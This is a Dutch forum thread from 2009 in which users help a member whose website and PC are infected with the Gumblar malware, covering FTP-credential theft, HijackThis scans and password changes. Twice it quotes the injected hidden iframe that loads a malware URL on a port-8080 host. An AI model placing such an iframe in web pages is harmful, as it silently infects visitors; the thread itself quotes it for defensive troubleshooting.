DIG Digital Corner
Alles wat je altijd al over computers, hardware, software, internet en elektronische gadgets had willen weten, maar niet op Tweakers.net durft te vragen.
jaquote:Op dinsdag 11 augustus 2009 12:02 schreef St4ck3r het volgende:
<iframe src="http://c6h.at:8080/ts/in.cgi?pepsi138" width=125 height=125 style="visibility: hidden"></iframe>
Ze wisselen wel mooi af met linkjes
hier waren er ook 2 verchillende. 1 naar .ru en 1 naar .in . En het waren totaal andere linkjes.Ik vraag me af, hoe dit concreet opgelost gaat worden.
Zoals bovenstaand scenario.. als RE de laptop op het bedrijfsnetwerk heeft aangesloten, worden al die website's geinfecteerd... iedereen die die site's bezoekt, krijgt hem ook...
Ga je dat ooit stoppen?
-||||-----||||- Iron and me, we're meant to be -||||-----||||-
Dat heb ik al gezegd ja.quote:Op dinsdag 11 augustus 2009 @ 12:01 schreef Qwea het volgende:
[..]Heeft hij die laptop ook op het bedrijsnetwerk aangesloten?
Haal je dat nu van mijn site? Ik zou er niet heen gaan als ik jou wasquote:Op dinsdag 11 augustus 2009 @ 12:02 schreef St4ck3r het volgende:
<iframe data-src="http://c6h.at:8080/ts/in.cgi?pepsi138" style="visibility:hidden;" width=125 height=125 style="visibility: hidden"></iframe>
Ze wisselen wel mooi af met linkjes
Ziggy played guitar
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
Als je nog niet geformatteerd heb kan ik je misschien nog helpen. Formatteren altijd als een laatste optie houden. Maar het Gumblar (een redirect virus) spreidt zich inderdaad via websites en FTP. Je hoeft deze onderstaande stappen niet te volgen. (Is dit je eigen computer?) Alle tools op eigen risico.
Stap 1:
Download Trend Micro HijackThis
http://www.trendsecure.co(...)ity_tools/hijackthis
Systeem Scan
Open HijackThis.
Klik op “Do a systemscan and save a logefile”
Een nieuw venster in kladblok komt te voorschijn; “hijackthis.log”
Kopieer de gehele log. Kopieer en plak deze log en zet het in je volgende reply.
Na het kopieren van de log het programa afsluiten.
Er zijn nog meerdere stappen zodra ik je HijackThis log heb bekeken.
Stap 1:
Download Trend Micro HijackThis
http://www.trendsecure.co(...)ity_tools/hijackthis
Systeem Scan
Er zijn nog meerdere stappen zodra ik je HijackThis log heb bekeken.
█▄ █▄█ █▄ █▄█▄█ █▄█ ▀█▀
TryAndResistClicking. Trollspray.
TryAndResistClicking. Trollspray.
Bij MM op het werk issie ookquote:Op dinsdag 11 augustus 2009 12:10 schreef MissBliss het volgende:
[..]
Dat heb ik al gezegd ja.
[..]
Haal je dat nu van mijn site? Ik zou er niet heen gaan als ik jou was
Vandaar dat MM hem op zijn site ook had. Complete chaos
-||||-----||||- Iron and me, we're meant to be -||||-----||||-
Het is mn eigen computer ja. Ik durf dit nietquote:Op dinsdag 11 augustus 2009 @ 12:11 schreef CantFazeMe het volgende:
Als je nog niet geformatteerd heb kan ik je misschien nog helpen. Formatteren altijd als een laatste optie houden. Maar het Gumblar (een redirect virus) spreidt zich inderdaad via websites en FTP. Je hoeft deze onderstaande stappen niet te volgen. (Is dit je eigen computer?) Alle tools op eigen risico.
Stap 1:
Download Trend Micro HijackThis
http://www.trendsecure.co(...)ity_tools/hijackthis
Systeem ScanOpen HijackThis. Klik op “Do a systemscan and save a logefile” Een nieuw venster in kladblok komt te voorschijn; “hijackthis.log” Kopieer de gehele log. Kopieer en plak deze log en zet het in je volgende reply. Na het kopieren van de log het programa afsluiten.
Er zijn nog meerdere stappen zodra ik je HijackThis log heb bekeken.
Net belde Dizer (die heeft de site gemaakt), hij heeft pcextreme gebeld (site van die vriendin van mij die het ook heeft is daar ook gehost) maar die snappen er ook niks van.
Hij gaat iig op zijn schone computer de wachtwoorden enzo veranderen, want ik ben bang dat als ik het doe, het virus het zo weer gevonden heeft
Ziggy played guitar
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
call gelogd bij helpdesk, responsetijd 3 uurquote:Op dinsdag 11 augustus 2009 12:03 schreef Qwea het volgende:
[..]
ja
Ik vraag me af, hoe dit concreet opgelost gaat worden.
Zoals bovenstaand scenario.. als RE de laptop op het bedrijfsnetwerk heeft aangesloten, worden al die website's geinfecteerd... iedereen die die site's bezoekt, krijgt hem ook...
Ga je dat ooit stoppen?
, dus ik merk het wel
04-08-11, 02-02-12, 20-06-14, 13-08-15
3u?quote:Op dinsdag 11 augustus 2009 12:20 schreef Re het volgende:
[..]
call gelogd bij helpdesk, responsetijd 3 uur
dat zijn ze schromelijk te laat ws Ik zou dan ook gelijk aangeven dat ze de website's na moeten lopen die gehost worden bij je werk. En alle andere comps in het netwerk
-||||-----||||- Iron and me, we're meant to be -||||-----||||-
Het virus dat zich zogenaamd verspreidt via Flash is wel redelijk bizar verhaal. Ik ga er aan werken.quote:Op dinsdag 11 augustus 2009 12:18 schreef MissBliss het volgende:
[..]
Het is mn eigen computer ja. Ik durf dit niet
Net belde Dizer (die heeft de site gemaakt), hij heeft pcextreme gebeld (site van die vriendin van mij die het ook heeft is daar ook gehost) maar die snappen er ook niks van.
Hij gaat iig op zijn schone computer de wachtwoorden enzo veranderen, want ik ben bang dat als ik het doe, het virus het zo weer gevonden heeft
Zo te zien kan PCExtreme er wel wat aan doen, maar dan moet ik even wat het een en ander doen. Eerst beginnen met de ww's wijzigen.
Weer een reden om over te stappen op Apple
Friends don't let friends remain beardless...
Klopt. Zolang dat virus nog actief is in je netwerk/ op je pc.. kun je veranderen wat je wilt maar dat gaat geen ruk helpen.quote:Op dinsdag 11 augustus 2009 12:18 schreef MissBliss het volgende:
[..]
Het is mn eigen computer ja. Ik durf dit niet
Net belde Dizer (die heeft de site gemaakt), hij heeft pcextreme gebeld (site van die vriendin van mij die het ook heeft is daar ook gehost) maar die snappen er ook niks van.
Hij gaat iig op zijn schone computer de wachtwoorden enzo veranderen, want ik ben bang dat als ik het doe, het virus het zo weer gevonden heeft
Het wachtwoord wordt nou veranderd door dizer, maar jij kan niet inloggen op de servers meer... niet eerder dan je pc's schoon zijn, anders begin je weer van vooraf aan
-||||-----||||- Iron and me, we're meant to be -||||-----||||-
quote:Op dinsdag 11 augustus 2009 @ 12:23 schreef Dizer het volgende:
[..]
Het virus dat zich zogenaamd verspreidt via Flash is wel redelijk bizar verhaal. Ik ga er aan werken.
Zo te zien kan PCExtreme er wel wat aan doen, maar dan moet ik even wat het een en ander doen. Eerst beginnen met de ww's wijzigen.
Weer een reden om over te stappen op Apple
Re had het toevallig wel van de week over: zullen we een nieuwe computer kopen? Dus wie weet
Ziggy played guitar
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
Nee, dan blijf ik er vanaf!quote:
[..]
Klopt. Zolang dat virus nog actief is in je netwerk/ op je pc.. kun je veranderen wat je wilt maar dat gaat geen ruk helpen.
Het wachtwoord wordt nou veranderd door dizer, maar jij kan niet inloggen op de servers meer... niet eerder dan je pc's schoon zijn, anders begin je weer van vooraf aan
Oh ja, wat ik wilde vragen: ik heb 2 versies van de site op mn pc staan, 1 op C en 1 op J. Ik upload hem altijd vanaf J. Is dan de kans groot dat het virus op J staat? Daar staan alleen foto's, muziek en die website dus, geen systeemdingen.
Ziggy played guitar
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
quote:Op dinsdag 11 augustus 2009 12:23 schreef Dizer het volgende:
[..]
Het virus dat zich zogenaamd verspreidt via Flash is wel redelijk bizar verhaal. Ik ga er aan werken.
Zo te zien kan PCExtreme er wel wat aan doen, maar dan moet ik even wat het een en ander doen. Eerst beginnen met de ww's wijzigen.
Weer een reden om over te stappen op Apple
Flash en adobe reader.quote:Op dinsdag 11 augustus 2009 12:23 schreef Dizer het volgende:
[..]
Het virus dat zich zogenaamd verspreidt via Flash is wel redelijk bizar verhaal. Ik ga er aan werken.
Zo te zien kan PCExtreme er wel wat aan doen, maar dan moet ik even wat het een en ander doen. Eerst beginnen met de ww's wijzigen.
Weer een reden om over te stappen op Apple
quote:Wat doet Gumblar?
Het doel van de malware is om zoveel mogelijk computers te besmetten en gevoelige informatie van de deze computers te stelen. Gumblar gaat na infectie van een computer op zoek naar zogenaamde FTP-inloggegevens. FTP wordt vaak gebruikt om websites te updaten. Deze gegevens worden door Gumblar gebruikt om toegang te krijgen tot de content van allerlei (goed bedoelde) websites. Webpagina's van deze sites worden vervolgens aangepast. Bezoek je zo’n site, dan krijg je deze nieuwe malware aangeboden. Dit gebeurt opnieuw via de kwetsbare plekken in Adobe PDF Reader en Adobe Flash wanneer je zo'n website bezoekt. Op deze manier worden computers geïnfecteerd met de Gumblar code.
Ook worden er aanpassingen gedaan in Internet Explorer, de webbrowser. Deze aanpassingen zorgen ervoor dat zoekresultaten in Google worden gemanipuleerd en verwijzen naar sites waarmee malware verspreid wordt.
Naast het manipuleren van Google-zoekresultaten en het stelen van FTP-inloggegevens zal een besmette computer:
Ik vraag me af waarom vista niet.quote:Affected Platforms:
The malware affecting PCs targets prevalent Microsoft platforms:
* Microsoft Windows 2000
* Microsoft Windows XP
* Microsoft Windows Server 2003
overigens, wat moet PCextreme hieraan doen? Als je gewoon de nieuwe adobe's hebt... loop je geen risico. PCE kan moeilijk adobe voor je gaan updaten
Trouwens, ik ben wel benieuwd naar de root login log van PC extreme. Kun je daaraan komen?
-||||-----||||- Iron and me, we're meant to be -||||-----||||-
Dat ding kan zich werkelijk overal hebben ingenesteld.quote:Op dinsdag 11 augustus 2009 12:26 schreef MissBliss het volgende:
[..]
Nee, dan blijf ik er vanaf!
Oh ja, wat ik wilde vragen: ik heb 2 versies van de site op mn pc staan, 1 op C en 1 op J. Ik upload hem altijd vanaf J. Is dan de kans groot dat het virus op J staat? Daar staan alleen foto's, muziek en die website dus, geen systeemdingen.
Doe een ctrl + alt + del... staat daar eigk een proces met iets als " gumblar" ?
-||||-----||||- Iron and me, we're meant to be -||||-----||||-
Ok, ook niet meer googlen in IE dus 
Zal je zien, ben ik er straks na 100 jaar eindelijk vanaf, ga ik per ongeluk naar een besmette site en gebeurt het weer opnieuw
Zal je zien, ben ik er straks na 100 jaar eindelijk vanaf, ga ik per ongeluk naar een besmette site en gebeurt het weer opnieuw
Ziggy played guitar
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
Nee, dat dan weer niet.quote:
[..]
Dat ding kan zich werkelijk overal hebben ingenesteld.
Doe een ctrl + alt + del... staat daar eigk een proces met iets als " gumblar" ?
Ziggy played guitar
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
Ouch, ik las de OP en dacht 'ff de site bekijken'. Mn pc is direct gecrashed, en ik zit op werk (internetbedrijfje). Ik hoop dat de virusscanner hier z'n werk doet, anders heb ik een probleem
"Dat is echt ontzettend zielig" ©
Neh, je hebt avast toch? Die gaf gisteren flink lawaai toen ik op een besmette site kwam. Gewoon dan kiezen voor connectie afbreken... dan laad het iframe nietquote:Op dinsdag 11 augustus 2009 12:32 schreef MissBliss het volgende:
Ok, ook niet meer googlen in IE dus
Zal je zien, ben ik er straks na 100 jaar eindelijk vanaf, ga ik per ongeluk naar een besmette site en gebeurt het weer opnieuw
-||||-----||||- Iron and me, we're meant to be -||||-----||||-
Oh sorryquote:Op dinsdag 11 augustus 2009 @ 12:34 schreef Litso het volgende:
Ouch, ik las de OP en dacht 'ff de site bekijken'. Mn pc is direct gecrashed, en ik zit op werk (internetbedrijfje). Ik hoop dat de virusscanner hier z'n werk doet, anders heb ik een probleem
Ik zal de link uit de OP halen!
Ziggy played guitar
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
Download ff avast. Ik snap het niet he...quote:Op dinsdag 11 augustus 2009 12:34 schreef Litso het volgende:
Ouch, ik las de OP en dacht 'ff de site bekijken'. Mn pc is direct gecrashed, en ik zit op werk (internetbedrijfje). Ik hoop dat de virusscanner hier z'n werk doet, anders heb ik een probleem
Ook op MikeyMo zn werk... ze hebben daar virusscanners... en geen enkele is afgegaan
terwijl hier gelijk mijn pc ging lopen schreeuwen " BAD IFRAME! VIRUS! TROJAN!"
-||||-----||||- Iron and me, we're meant to be -||||-----||||-
Ok.quote:Op dinsdag 11 augustus 2009 @ 12:34 schreef Qwea het volgende:
[..]
Neh, je hebt avast toch? Die gaf gisteren flink lawaai toen ik op een besmette site kwam. Gewoon dan kiezen voor connectie afbreken... dan laad het iframe niet
Ziggy played guitar
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
MB? Is het handig om de TT te wijzigen? Je weet nu immers wat het probleem precies is.
Ik zeg maar wat hoor
Je weet nu immers wat het probleem precies is.Ik zeg maar wat hoor
-||||-----||||- Iron and me, we're meant to be -||||-----||||-
Ja, goed idee!quote:Op dinsdag 11 augustus 2009 @ 12:36 schreef Qwea het volgende:
MB? Is het handig om de TT te wijzigen?
Ik zeg maar wat hoor
Zal ik het zelf doen?
Ziggy played guitar
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
Ooh, en zet je internet beveiliging van avast (iets met surfen ofzo in de instellingen) op hoogquote:
I did it 
-||||-----||||- Iron and me, we're meant to be -||||-----||||-
je bent toch niet voor jan snot modquote:Op dinsdag 11 augustus 2009 12:37 schreef MissBliss het volgende:
[..]
Ja, goed idee!
Zal ik het zelf doen?
-||||-----||||- Iron and me, we're meant to be -||||-----||||-
Gedaan en gedaan
Ziggy played guitar
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
|
|
